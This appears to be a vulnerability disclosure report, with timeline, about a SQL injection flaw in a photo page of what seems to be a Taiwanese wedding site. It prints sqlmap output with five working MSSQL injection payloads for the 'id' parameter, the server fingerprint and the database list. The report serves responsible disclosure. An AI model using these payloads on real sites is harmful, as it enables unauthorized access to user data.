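2015-11-24: Details reported to the vendor; awaiting vendor handling
2015-11-27: Vendor confirmed; details disclosed to the vendor only
2015-12-07: Details disclosed to core white hats and experts in related fields
2015-12-17: Details disclosed to regular white hats
2015-12-27: Details disclosed to intern white hats
2016-01-11: Details disclosed to the public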
RT
Target: http://**.**.**.**/photosview/lover_map.asp?id=1
Host IP: **.**.**.**
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MSSQL 2000 with error
Resp. Time(avg): 2747 ms
Current User: madmin
Sql Version: Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64) Jul 9 2008 14:17:44 Copyright (c) 1988-2008 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 <X64> (Build 6002: Service Pack 2)
Current DB: wed168
System User: madmin
Host Name: A-WED168-COM-TW
Server Name: SQL-2008
master
tempdb
model
msdb
ReportServer
ReportServerTempDB
wed168
wed1681
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 5799=5799

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=1 AND 2308=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(100)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2308=2308) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(100)+CHAR(112)+CHAR(113)))

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=1; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=1 WAITFOR DELAY '0:0:5'--

    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(107)+CHAR(100)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2094=2094) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(99)+CHAR(100)+CHAR(112)+CHAR(113))
---
[11:24:28] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
http://**.**.**.**/photosview/lover_map.asp?id=1
available databases [8]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] wed168
[*] wed1681
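Messages can be sent in bulk to users.
Severity: High
Vulnerability Rank: 17
Confirmed at: 2015-11-27 21:59
Thank you for the report.
2016-01-07: After receiving the report, HITCON emailed the service mailbox listed on the website multiple times and also phoned the company to inform it of this vulnerability, but the company has still not responded.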